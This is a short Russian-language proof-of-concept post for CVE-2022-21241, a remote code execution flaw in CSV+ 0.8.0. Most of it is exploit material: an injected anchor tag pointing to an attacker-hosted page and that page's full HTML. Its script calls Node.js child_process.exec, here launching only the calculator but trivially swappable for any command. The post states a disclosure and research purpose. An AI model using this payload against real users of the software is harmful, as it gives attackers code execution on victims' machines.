
👻 [PoC] CSV+ 0.8.0 - Произвольное выполнение кода (CVE-2022-21241)
👻 Уязвимость выполнения произвольного кода в 2 клика.

CVE-2022-21241
⚠
Этот PoC был создан для предупреждения пользователей и исследования уязвимостей в их собственных CSV+, и его использование для атак запрещено.
Следующие версии уязвимы.
Злоумышленники могут выполнить произвольный код, используя функциональность Node.js. Они разместят вредоносный js-код на каком-либо сайте и свяжут его из a-тегов с уязвимостью HTML-инъекции в CSV+.

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html — временная ссылка.
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hi :)
</body>
</html>